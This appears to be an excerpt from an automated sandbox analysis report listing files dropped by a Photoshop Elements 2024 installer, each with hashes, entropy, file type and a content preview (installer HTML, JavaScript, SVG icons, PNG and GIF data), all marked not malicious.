                                                                                                      Preview:<!DOCTYPE html>..<html>..<head lang="en">.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />.. <link rel="stylesheet" type="text/css" href="clean.css">.. <link rel="stylesheet" type="text/css" href="content.css">.. <link rel="stylesheet" type="text/css" href="common.css">..</head>..<body onload="onLoadComplete()">.. <div class="container">.... <div class="text-center downloaderContent" id="downloaderPackageContent">.. <div class="centerMid">.. <img src="" />.. <div class="packageName"></div>.. </div>.. </div>.... <div class="content text-center" id="productContent">.. <div class="centerMid">.. <img src="" />.. <div class="productName"></div>.. <div class="productVersion"></div>.. </div>.. </div>.... <div class="downloadOptions" id = "downloadOptions">.. <div class="do
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (363), with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):36834
                                                                                                      Entropy (8bit):5.0023261444862275
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:DrlLXh1YEOzCZCpFP73Gtm1L10bA/XKgA2/+iGpCvce4d5vQmUbp:DrlLXhmvCZC/3GtG5X+1pCke4d5vrUN
                                                                                                      MD5:E704DB9AE855BC38284C7C6AEF87A7B0
                                                                                                      SHA1:C5C8C496CBB9497B4B013547C328270E9C2F6040
                                                                                                      SHA-256:162B60AF1E71A04E3CF3E0ED5E9806F3C253F7DCD6AD1B08D0BF6B05A8593844
                                                                                                      SHA-512:2DE4818292C1B196946DD06AD5CAD3BFAA91B92DE2760371E9B8844557B80754C747A39763E6626D155FBAF00683800AA465BC1224F22615EFA2ED8766C86E18
                                                                                                      Malicious:false
                                                                                                      Preview:/**.. * Created by abhjain on 12/21/2015... */....$(document).ready(function() {.. init();..});....function onLoadComplete() {.. /* Code to disable tab key handling.. $('.container').keydown(function (objEvent) {.. if (objEvent.keyCode == 9) { //tab pressed.. objEvent.preventDefault();.. }.. }).. */.... $("#selectAllProducts").keydown(function (event) {.. if (event.keyCode === 13) {.. $("#selectAllProducts").click();.. }.. });.... $("#languageOptionDropdownHead").keydown(function (event) {.. if (event.keyCode === 13) {.. dropdownMenuToggle($('#languageDropdownOptionsList'));.. }.. });.... $("#locationOptionDropdownHead").keydown(function (event) {.. if (event.keyCode === 13) {.. dropdownMenuToggle($('#locationDropdownOptionsList'));.. }.. });.... $("#downloadLocationOptionDropdownHead").keydown(function (event) {.. if (event.keyCode === 13) {..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):749
                                                                                                      Entropy (8bit):5.476176820648931
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:TMHdwHaNi/nzVO3/KYIg3cCiHmJqrFd6hzqDccqFJFMvJq:2dikAALIgsdGcrf6hzacPJFMvI
                                                                                                      MD5:E7B1717B9EBA236B9C12BE7A980B5B40
                                                                                                      SHA1:F1BAA3F41FFA5DFFF320B7E289964CEC54F19A99
                                                                                                      SHA-256:2A48E8DB0F3991DE1088936F56C583FE615FAE4B9E14F4EBE2B33D29138088F3
                                                                                                      SHA-512:9C8DEBE604372AC1FE3945579EE843F13DF6F8D40F2C402590743009B39C5F80E859830FC422D7F8D447C4E30F1198584850DE657FACFAA2B84955D386563B88
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="S_AdobeLogo_24_N_2x" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"... x="0px" y="0px" viewBox="0 0 24 24" style="enable-background:new 0 0 24 24;" xml:space="preserve">..<style type="text/css">....st0{fill:#FF13DC;fill-opacity:0;}....st1{fill:#ACACAC;}..</style>..<title>S_AdobeLogo_24_N@2x</title>..<rect id="Canvas" class="st0" width="24" height="24"/>..<g>...<polygon class="st1" points="14.6,3 22,3 22,21 ."/>...<polygon class="st1" points="9.4,3 2,3 2,21 ."/>...<polygon class="st1" points="12,9.6 16.7,21 13.6,21 12.2,17.4 8.8,17.4 ."/>..</g>..</svg>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):958
                                                                                                      Entropy (8bit):5.381157379214617
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2dikAiLMdGAEh6tzoI2xjwv4mp1mXcD1QCtP:cikA2MdKQvpCcKCB
                                                                                                      MD5:332816D7725FC31725B678CFF1CB6DCC
                                                                                                      SHA1:876F938EFB86C1BB1733B47EC279335DE97576DA
                                                                                                      SHA-256:8B5469642507C00B9130BF7ED17A1E4D221E2A93DFD4D2972163650C4E94D714
                                                                                                      SHA-512:5C4A678892B1A550A0C85E77F75C8B56FEBBFCD92C658DAB198197ED17D7FAD04D7B65F8ADC17E095895366BF933421CAE30E430E136870D3E02E9F89D115775
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="S_Alert_24_N_2x" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"... y="0px" viewBox="0 0 24 24" style="enable-background:new 0 0 24 24;" xml:space="preserve">..<style type="text/css">....st0{fill:#FF13DC;fill-opacity:0;}....st1{fill:#E44853;}..</style>..<title>S_Alert_24_N@2x</title>..<rect id="Canvas" class="st0" width="24" height="24"/>..<path class="st1" d="M22.2,19.5L12.9,2.6c-0.3-0.5-0.9-0.7-1.4-0.4c-0.2,0.1-0.3,0.2-0.4,0.4L1.8,19.5c-0.3,0.5-0.1,1.1,0.4,1.4...C2.4,21,2.5,21,2.7,21h18.6c0.6,0,1-0.4,1-1C22.3,19.8,22.3,19.7,22.2,19.5z M12,19.5c-0.8,0-1.5-0.7-1.5-1.5s0.7-1.5,1.5-1.5...s1.5,0.7,1.5,1.5S12.8,19.5,12,19.5z M10.8,14.5v-7C10.8,7.2,11,7,11.3,7h1.4c0.3,0,0.5,0.2,0.5,0.5v7c0,0.3-0.2,0.5-0.5,0.5h-1.4...C11,15,10.8,14.8,10.8,14.5z"/>..</svg>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 88 x 84, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3054
                                                                                                      Entropy (8bit):7.920741815156119
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EetobvO+qOt7dLQDys5pZBAmoM67nXGzwONXAyP+RNONUTRbUc:EetOhlldkDy6ploN7O3NQyoON2F
                                                                                                      MD5:EB5FDB63686193E55826A8DD77D64412
                                                                                                      SHA1:977C4788ABF0F274E74281C4DA76C0C3D2F26B76
                                                                                                      SHA-256:1DBCFFB6B2837F5C42CC90713F01F7E7E82B45337DE78B1204F67E0AD7FA488B
                                                                                                      SHA-512:C3849CC0A289A36A70E7B4968BC379E118CA80D3E87AFF2477FD7FBD514B66CD67E199B17B41277A6F3C8794B88CC69532B233016BFEC2EE98D3F0C17DBBC4E8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...X...T......W.O....pHYs...........~.....IDATx..]kl...>k....c.6v.....HL....*.,."..(U..*?Z....O!R.3.....?m.T.R5.............$.B.%P.K.~?.56.1[}.{.y..;............{.;.L&Cv.5o]EDOd.{......"ED...a..I...;+.C.[A.A"...%...h_&....~.....&.....0.......2..I.5...{....9.9"..\..c.\O.g...#8..F.wPi..TT..G.#9.8.|.[....vRq.v`2......Q..i.5.#.K.,.....l.p6.+)o.@5...0..T_.]O....$a#..."...z8.g.k.X5.@...0....8....b...}....q.j.,.>8TRjx...e.?.6.N.t..qO1..MD..l...r.j.Ozh...4.........T.f.........^.+$A..hU...}.)*.........f..i o:...E.,....*[6Q.8L..Lt.....,6....*o._.m..{P...,.$fG/S8.`..........O..u.NP....Tk.^..q=..M]:mz...>....&]........|zL...(.>..5To.M......Y....P.............P>$...a_.....Xu! 0...aY..Stc...y@....8L..&..\..#Q....w....ZaCWF... ...B.....Vw.....%_..`#a..^.%....>[!.X.!oB.;.F.6s.".?=)........6.B.g.R..B..N...4@.FO......Z.!,.B.I4.........&k....A.....;!...J.}%...'T~..9E...o..+.J..?...g..R....... ....Q......c....z..F.B...Za.FN.Z..+X(".d.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):295
                                                                                                      Entropy (8bit):7.009097145013056
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6v/lhPIcR8RtshA37j1nxheDag9C63DuB2ULuERgLe/MjJBmrUg6RpyHp:6v/7DR8ehIBnxhs063DuaecJMAOJ
                                                                                                      MD5:7AE9FB845B9137EF10002FE9D0F5C643
                                                                                                      SHA1:9F3FA2B29B1B40E1B6794E5D624524DE297A8B59
                                                                                                      SHA-256:E9E5FC264337BF6845B2CF2720DDCDE8936CB120328087917BF94C5911EDD74A
                                                                                                      SHA-512:4420CDFBC47D2AC804F1C05840E4113B098FFC71E95E11FFE8F95342F5A75DC0F35FE8012984B0D645F1310B524F66069AE0C0FE053E0D601D39ADED321C15CD
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............Vu\.....sRGB.........IDAT(...=..@.F.m .j..........E....../.......K..Iv.|...U....U.4.(.^...<.7A...Qi..r...8\...L.u.-...x*..n.....m{Qd.l..a*.......=F..-........hc...5.cv%4....1._6...h...Yy....HY{.&H..l..{.q...?x5{6......G`.X-.....&..7.....h....Di....IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 29 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):550
                                                                                                      Entropy (8bit):7.4943976070292
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7DX8MbUByUhWoXk84XVOd9ZH3YiHNrjgF7doOxQIHYJ/Nz:SXfwBhWoXR4UVNr0FCSQI+d
                                                                                                      MD5:8D2C84506F3F48A810EB7232DC000D6F
                                                                                                      SHA1:F4A238C1F7C02C7C907368B939EFBA7512C6BE5A
                                                                                                      SHA-256:C4620BC8B293DD89DB628D2002EF9FE02055E2D1CFF1F07E18A3E2E4942AB7F1
                                                                                                      SHA-512:0FCCA755A410C7EF4E6F056B7267AAF23D5063DD8230528FC3765ED1E3D12042C930F999A54498E754FCB3565DF17636D7A5DE2E95E142AE139D17A744EC93A9
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............<T......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.M.0.m$...a....Z6..t.0AF.. e..A....a.s...............}qv....O.9.Z.....?+.....4M..'.z2. X.#...x.u....7D!..2]Y..&......H.GH..Kw/....{._.'.....y5v..P....<....*N.......&......4....k...C../.Ta.......5l}&!E*.t.n..6~.......69%z..H......g..Ta7..>.8.....R.R..O.cI..R.....*.).M.....Ow..K..XSUa[te_.....y.>f.a...,/..LL-..9.6..[...-...mBN...b]G6.N....FZB.Qp..zr.1..f.s..Pp....>4..bb..P..@.=...T.}[.Ou.s..G|...o.-..-..=f..).....U..G........s..C......K.$......IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 30 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):654
                                                                                                      Entropy (8bit):7.557922780675891
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/7+9s/6Tog8r/TlK9zi41xfBL6Hms18Vcgu82O8JyfKyoby1:bs/6Bw/Tlkj/fBLgb8yk21JyCtu1
                                                                                                      MD5:13B5F5E052334E0AD6D31845FC859E3D
                                                                                                      SHA1:B71022382904D194A5D8F5CB3B1D0DD92E254B16
                                                                                                      SHA-256:87FD64C46642058FB6D7AE4AB2C71BA5DF7CE12FFB8B9383EDC7BB7A673F0306
                                                                                                      SHA-512:79E77EF0CC83C24D3D0F04A2340E248A8DD11469F43740B6453913648CF2C3C5592053DD4A5A34C81F3FFDFDD0FDDC5953454EE0D44D3AC946B2DDBE17ADA584
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR..............c,.....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx.V-t.@.n.0...Ij.b.b.......i.f.......Hj.d..]_..Z6......|.....t.Y..i..G9.L+.........h.N.&Z...M...A..QK...DM..(.A..$..U....J..C..h.p...V`q1.gz.....2{.^e...o..$.m$r.#2..F(..!:.@.b._.....>-....}..s]..0...}..!....hF"'..`.Au>..E.pK..c..fM........T(s:g..2...m.I..#.aG.....u.....-.c..$.<..z......ana..Q.DYW.'%....b....{.q..n.W/..l.........KX9=/....B...UM....\....xf.p.s.Bs.....>-..{.3}!...^..[5.J.g.8...'....@9......g.p....r..M..1.M....."...........+&..?".....X*?.{..E..^..H...=;-........jp.O.4......C....^E.s..Gam...7..K.....A.-q.....IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):167
                                                                                                      Entropy (8bit):6.101455760967006
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:yionv//thPlZl+cR8LtsesyxNwGol4ikRUIW1qdyJ1/iTcOMNMhPTFoFg407PQ0p:6v/lhPIcR8Rtsuw3l4x1E1wcO1PTFoFU
                                                                                                      MD5:D13CECC413374C4DDC22A9EDACDE8A11
                                                                                                      SHA1:981295DD1F713584591716A6E753346B8A89215A
                                                                                                      SHA-256:B9C9AE215DAF1BB5B6692F527375207AEDC138891947E5F6C1C6B549C2EBF39A
                                                                                                      SHA-512:A717E64430A4680D09C555183C69705998FBEC4CB8AA41AC6AD10DF9FBD4F4E2243548689F12695760D5B191ED62A38A92558BC88A730004D7119DBE017C6241
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............Vu\.....sRGB........aIDAT(.c...FF.Y@,......1......d.P.,.....6y...x,`.......O.6.Q..B.].....1,..%....f..i@..]...R....Z.#;...}....IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):317
                                                                                                      Entropy (8bit):6.90777917772511
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6v/lhPIcR8R7AAR2DWNU0xG1oScwDn/SC4ucnrK1pesYD8+vuQYu5GtzNdGp:6v/7DR87AAR2Dn0g1okn/Sb3rUpe+BQv
                                                                                                      MD5:9F7974BBCC96F12769C1856045EB7BC7
                                                                                                      SHA1:FA0B9B9D709718839EA525AB838260A4E124FB1D
                                                                                                      SHA-256:E7FCFF2549114496E8141F46A7606F740BBADF22C9AD818C40D9FF9B9EA12198
                                                                                                      SHA-512:BC38C23791A8AD4E596E921BC5E391D39BEA998434915D5C25B1B37015A089FE91CE9510774C48FBC91E52400C5843897A5780AA1C2CF5C8B73D3F89A2AA0856
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............Vu\.....sRGB.........IDAT(......@.E.I..-....;+.;.t~......~C^?..ll...A."U...{EC.W/Lvv..e#L..)...B4.J..y........of."i..C....w.8A*@.$I..m......g..,R.O...y[.0*(.Y..nq...4m.v..cg.q..q...)......\.=fY6 ..~X.{.)aYV...u.E. .^.....\....u}....4....0i...._.[..?X.`W...a....IB.....z`AG.w....IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):224
                                                                                                      Entropy (8bit):6.637350346135181
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:6v/lhPIcR8R1VpDijzdQ/xaC8VAld1O55Uh5Op:6v/7DR8dDiju/4NY42h58
                                                                                                      MD5:EE8599707751BEFDDB2B94BC79525C15
                                                                                                      SHA1:E118B48E25FE42D933377B03FB5A9A710E1C5CAA
                                                                                                      SHA-256:C1F6844923F7C311D996D81EED6D8E769D52DF6D95C898187D92997ABBB2770B
                                                                                                      SHA-512:CDCE6D59C807DD1D2B13AF39E2FE078B0C0AD51B021DC30373E18BDE2A807449051F3F9084AFA15B2F6D943169C1BC246C7DBE6E965DDACACB961F67269FB548
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............Vu\.....sRGB.........IDAT(..;..!.E...4..]..4$H3..J..Wa\..=..C.M...K.._...14J).Zkc..RJy}..!.sW..9.Dl.9y.....c.........r=p.p...vL.....z%.$.I..0.."...j..3Q..U......&.mt>stFC........IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):289
                                                                                                      Entropy (8bit):5.117544094088991
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:tvKIiad4mc4sl3ULAmXKPqLujc6QwF2c47WiBCLQwJHrdGolljqSG7Y:tvG16naPqLujKwF2cGWiB+QwJHZljpGE
                                                                                                      MD5:4585F70294E7B625DCD1EA8C585067A5
                                                                                                      SHA1:11C92AE523B0C588C5469814B0C3C7778CB3F133
                                                                                                      SHA-256:7E58A1CCE147DF03605A92FFDA1B88CA26005C09D1EB9AE56F37ACCDEBBFE348
                                                                                                      SHA-512:DEB1CE83D9BDFF93EFF950ED267076E5E8A7BB43CD2DDE28561C3D07F68094A9C99DF594BF2FDCB38FDDF9656CD51475108AD1B29F8C9D4BF197E6DA5A093B03
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 6"><title>dropdown</title><path d="M9,12a1,1,0,0,1-.71-.29l-4-4A1,1,0,0,1,5.71,6.29L9,9.59l3.29-3.29a1,1,0,0,1,1.41,1.41l-4,4A1,1,0,0,1,9,12Z" transform="translate(-4 -6)" style="fill:#8e8e8e"/></svg>
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):466
                                                                                                      Entropy (8bit):7.326200947745523
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6v/78TBJ/+wTX6U5+wDXp0wYnP56fU/hktM9iRazSjlN:x3fqU5+k456fMh2MDzON
                                                                                                      MD5:7978536150734CEFFAF0720837E8B302
                                                                                                      SHA1:7C11361AF6E41D00BEFFAF4EF9E677506B32164D
                                                                                                      SHA-256:5D10637927B7A623428560EAF18FB8EAF439CD8731199C3B4D251B9846841183
                                                                                                      SHA-512:DA5BB4329783BA623E12D3DC50B2C080E8AC2AFF4D4F25DC3E1D84561FD9B40B158570B98DD24618762562674FC1B7D10E081677F214EC859ECC5D0B477DB0F7
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR................a....sRGB.........IDAT8..S=K.A...;........}@..6.U....boa'.-..B.G.V.Z.....!b!.R......M.x..|...fw.`..o4N.R.L.....k.-p.g.(.(u./yX.....r..,'...d..~.~.B.g....-....c{L.+.K.>(5..p...1"^>.8.6X'v.-)......DERW.... aG<g.1.x..T&...1..5....r9M..|.y3.L..Ta....|....Z.:'..Y..N.c...4..g....be.u+V...T.4.yN..F.|....,....F.w..y;.q.G.M_..a..y`.Dd..1..R.V....I9.o..P.G).*,uS.O...F.$.m..|#.3..MM....pO........!.I.GV..C..o..i.0.......IEND.B`.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602
                                                                                                      Entropy (8bit):5.170117530804048
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tvF6TT4I1LofEiSVE1wKc5yt/f6TZeoHuguQYWBff4vk:tW8I1cDk+Nc5S4ZtHkY4vk
                                                                                                      MD5:3530C5040AC9AF92CD0A7D347F764593
                                                                                                      SHA1:B815EF3654EC2C677E8F8F68D8527B6D8142B4E9
                                                                                                      SHA-256:DAF26AD61AEE6152CF7C0E8F2D3936D0C220DE2A3C329E6CE0FCC007CB64CA51
                                                                                                      SHA-512:0CE187A12445054E270337B6BDD6B035E8FADB3B0A4E8C822833C12431BB520340FA509AB3E1DF564CBF67700B9BA78EE246689267878D386E88F709D10C1FBD
                                                                                                      Malicious:false
                                                                                                      Preview:<svg id="S_FolderOpen_18_N" xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18">.. <defs>.. <style>.. .cls-1 {.. fill: #8e8e8e;.. fill-rule: evenodd;.. }.... .. </style>.. </defs>.. <title>S_FolderOpen_18_N</title>.. <path class="cls-1" d="M6,3L7.2,4.6,7.5,5H15V7H3V3H6ZM6.25,2H2.5a0.5,0.5,0,0,0-.5.5V7H0.288a0.25,0.25,0,0,0-.247.285L1.9,14.623A0.5,0.5,0,0,0,2.389,15H15.611a0.5,0.5,0,0,0,.485-0.377l1.864-7.338A0.25,0.25,0,0,0,17.712,7H16V4.5A0.5,0.5,0,0,0,15.5,4H8L6.65,2.2A0.5,0.5,0,0,0,6.25,2h0Z" transform="translate(0)"/>.. </svg>
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 88 x 84, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3054
                                                                                                      Entropy (8bit):7.920741815156119
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EetobvO+qOt7dLQDys5pZBAmoM67nXGzwONXAyP+RNONUTRbUc:EetOhlldkDy6ploN7O3NQyoON2F
                                                                                                      MD5:EB5FDB63686193E55826A8DD77D64412
                                                                                                      SHA1:977C4788ABF0F274E74281C4DA76C0C3D2F26B76
                                                                                                      SHA-256:1DBCFFB6B2837F5C42CC90713F01F7E7E82B45337DE78B1204F67E0AD7FA488B
                                                                                                      SHA-512:C3849CC0A289A36A70E7B4968BC379E118CA80D3E87AFF2477FD7FBD514B66CD67E199B17B41277A6F3C8794B88CC69532B233016BFEC2EE98D3F0C17DBBC4E8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...X...T......W.O....pHYs...........~.....IDATx..]kl...>k....c.6v.....HL....*.,."..(U..*?Z....O!R.3.....?m.T.R5.............$.B.%P.K.~?.56.1[}.{.y..;............{.;.L&Cv.5o]EDOd.{......"ED...a..I...;+.C.[A.A"...%...h_&....~.....&.....0.......2..I.5...{....9.9"..\..c.\O.g...#8..F.wPi..TT..G.#9.8.|.[....vRq.v`2......Q..i.5.#.K.,.....l.p6.+)o.@5...0..T_.]O....$a#..."...z8.g.k.X5.@...0....8....b...}....q.j.,.>8TRjx...e.?.6.N.t..qO1..MD..l...r.j.Ozh...4.........T.f.........^.+$A..hU...}.)*.........f..i o:...E.,....*[6Q.8L..Lt.....,6....*o._.m..{P...,.$fG/S8.`..........O..u.NP....Tk.^..q=..M]:mz...>....&]........|zL...(.>..5To.M......Y....P.............P>$...a_.....Xu! 0...aY..Stc...y@....8L..&..\..#Q....w....ZaCWF... ...B.....Vw.....%_..`#a..^.%....>[!.X.!oB.;.F.6s.".?=)........6.B.g.R..B..N...4@.FO......Z.!,.B.I4.........&k....A.....;!...J.}%...'T~..9E...o..+.J..?...g..R....... ....Q......c....z..F.B...Za.FN.Z..+X(".d.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:GIF image data, version 89a, 64 x 64
                                                                                                      Category:dropped
                                                                                                      Size (bytes):19226
                                                                                                      Entropy (8bit):7.80743643227984
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:9GYhZd78mNMfs/QflSegSOQkY/mdmHasA1mS0l+XIDivbyvUh:91HdFNMf7fRgSsUnA1GsGsh
                                                                                                      MD5:7699A4C54B1F5515A64E93FE3F801321
                                                                                                      SHA1:2E51F7E1A331D921EAF15BD7DC9721A742984D47
                                                                                                      SHA-256:9146E2390273AC868609DAC1BE7F1A0458B7D4F7ECDFE1EAEC107B3211F33AA2
                                                                                                      SHA-512:4810ABFECC92866145A22F73639264574958D6DB1157DA0B6FF0472C14D8171FFC633FC6BA04843FCFD617CE4F0C19633475D2501ACE48F8EE34EC8FA6FDED87
                                                                                                      Malicious:false
                                                                                                      Preview:GIF89a@.@.............w..p...y.z.......>........L..2..(~.............h............Y...k.....V...m..D............|......I........................$|....'}.q...d....k..A........x.....a....~......x......,..@..S.....:.....<..a...........@.....N........\..\.....e...................`...........\...n....."z.+........7........n..|.....u.......-.....u......T.........?....=..H..C..*...................................................t.....s.........................^...v........w.W..*...........................u....|...........(}......._......u.............../.................o........j..c......v.......m.......................r..t........w.>.......................................V..)~.............{...........u..........s.......!..NETSCAPE2.0.....!.......,....@.@........H..A...e...&T\...e.....3j...E.B....IL8h.(.......1.I...%S.R..g.D.j..I..&,.|...T(.F.&%R....+:.JU...J5R.Ts.%E.U.J@..)Va.Z.E..%.aWM.......A..y)...<&h..`..I.F.Jt.`.$7I.....#I
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):43
                                                                                                      Entropy (8bit):3.0314906788435274
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:CUkwltxlHh/:P/
                                                                                                      MD5:325472601571F31E1BF00674C368D335
                                                                                                      SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                      SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                      SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                      Malicious:false
                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (8681), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):14724
                                                                                                      Entropy (8bit):5.015214612878625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:gdnjU50hTj1W+owFDjHhIOku3sd9msmJBGDkZlUQVXGxKmQpq8lkpMzsASsX:anjU50hTjlomDdMXxmQU7p4WYsSsX
                                                                                                      MD5:AB3ADF4AFF09A1C562A29DB05795C8AB
                                                                                                      SHA1:F6C3F470AEA0678945CB889F518A0E9A5CE44342
                                                                                                      SHA-256:D05E193674C6FC31DE0503CBC0B152600F22689AD7AD72ADB35FCC7C25D4B01B
                                                                                                      SHA-512:44DFC748D0BD84F123F9D3F62D5EA137D9128D5BDBE45DA9A8666D09039EB179ACF0DBB3030E09896FD61E7AA5AE6DFAFFE9258D80949A64D0A7E45037791FB4
                                                                                                      Malicious:false
                                                                                                      Preview:(function(e){e.fn.customScrollbar=function(i,t){var o={skin:undefined,hScroll:true,vScroll:true,updateOnWindowResize:false,animationSpeed:300,onCustomScroll:undefined,swipeSpeed:1,wheelSpeed:40,fixedThumbWidth:undefined,fixedThumbHeight:undefined};var s=function(i,t){this.$element=e(i);this.options=t;this.addScrollableClass();this.addSkinClass();this.addScrollBarComponents();if(this.options.vScroll)this.vScrollbar=new n(this,new r);if(this.options.hScroll)this.hScrollbar=new n(this,new l);this.$element.data("scrollable",this);this.initKeyboardScrolling();this.bindEvents()};s.prototype={addScrollableClass:function(){if(!this.$element.hasClass("scrollable")){this.scrollableAdded=true;this.$element.addClass("scrollable")}},removeScrollableClass:function(){if(this.scrollableAdded)this.$element.removeClass("scrollable")},addSkinClass:function(){if(typeof this.options.skin=="string"&&!this.$element.hasClass(this.options.skin)){this.skinClassAdded=true;this.$element.addClass(this.options.skin
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (65482), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):93637
                                                                                                      Entropy (8bit):5.292996107428883
                                                                                                      Encrypted:false
